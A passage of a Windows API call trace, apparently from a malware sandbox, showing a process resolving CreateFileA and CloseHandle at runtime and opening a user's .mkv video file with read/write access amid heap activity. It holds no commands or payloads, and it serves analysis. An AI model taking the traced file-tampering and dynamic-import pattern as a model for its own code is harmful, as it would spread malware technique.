WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x889670, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0043.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0043.448] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0043.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0043.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0043.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0043.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0043.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0043.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0043.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0043.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0043.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv", cchWideChar=74, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 74 [0043.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4a) returned 0x7f3688 [0043.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv", cchWideChar=74, lpMultiByteStr=0x7f3688, cbMultiByte=74, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv", lpUsedDefaultChar=0x0) returned 74 [0043.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0043.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.450] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ooaw\\dzrcf9vo2bs-.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0043.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0043.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0043.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0043.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0043.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0043.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0043.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0043.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0043.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0043.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0043.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0043.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0043.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0043.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=74, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0043.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x94) returned 0x7c5448 [0043.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=74, lpWideCharStr=0x7c5448, cchWideChar=74 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv") returned 74 [0043.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0043.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0043.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0043.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0043.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0043.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0043.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0043.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0043.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0043.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0043.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0043.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0043.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0043.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0043.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0043.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0043.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0043.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0043.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0043.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0043.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0043.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0043.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0043.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0043.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0043.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0043.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0043.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0043.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0043.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0043.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0043.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0043.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0043.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0043.452] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0043.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0043.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0043.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0043.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0043.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0043.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0043.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0043.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0043.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0043.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0043.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0043.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0043.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0043.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0043.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0043.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0043.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0043.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0043.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0043.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0043.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0043.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0043.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0043.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0043.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0043.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0043.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0043.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0043.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0043.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0043.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0043.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0043.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0043.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0043.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0043.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.454] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0043.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0043.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0043.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0043.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0043.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0043.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0043.455] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0043.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0043.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0043.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0043.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0043.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0043.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0043.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0043.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0043.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0043.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0043.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0043.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0043.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0043.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0043.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0043.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0043.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0043.456] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0043.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0043.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0043.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0043.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0043.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0043.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0043.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0043.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0043.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0043.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0043.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0043.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0043.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.456] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0043.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0043.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0043.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889508 [0043.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889508, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0043.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0043.457] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0043.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0043.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0043.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0043.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0043.457] CloseHandle (hObject=0x140) returned 1 [0043.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0043.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0043.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0043.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0043.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0043.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0043.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0043.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0043.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0043.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0043.457] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0043.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0043.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0043.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0043.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0043.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0043.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0043.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0043.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0043.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0043.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 